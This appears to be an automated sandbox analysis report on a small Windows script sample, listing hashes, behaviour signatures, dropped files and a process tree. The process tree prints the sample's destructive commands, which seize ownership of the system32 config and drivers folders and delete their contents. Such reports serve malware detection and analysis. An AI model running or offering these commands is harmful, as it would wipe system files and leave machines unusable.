Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    15-08-2024 21:41

General

  • Target

    file01.wsf

  • Size

    3KB

  • MD5

    fefe72db31bfdbe4a0ae7f11cb852008

  • SHA1

    a43900d8e5e5c0a6b8af5c7468080dffd88aacbc

  • SHA256

    d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e

  • SHA512

    a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2892
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2508
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1644
  • C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T
    1⤵
      PID:1540

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs

      Filesize

      3KB

      MD5

      fefe72db31bfdbe4a0ae7f11cb852008

      SHA1

      a43900d8e5e5c0a6b8af5c7468080dffd88aacbc

      SHA256

      d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e

      SHA512

      a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0

    • C:\Users\Admin\Desktop\CompleteSave.vbs

      Filesize

      79B

      MD5

      355d25ae00d82afebe47bffcaa713a40

      SHA1

      c6790a7e5d81ad3d1149974c75947d3b2509f544

      SHA256

      93ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c

      SHA512

      08d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa

    • C:\Users\Admin\Music\WritePop.ogg

      Filesize

      2B

      MD5

      81051bcc2cf1bedf378224b0a93e2877

      SHA1

      ba8ab5a0280b953aa97435ff8946cbcbb2755a27

      SHA256

      7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

      SHA512

      1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d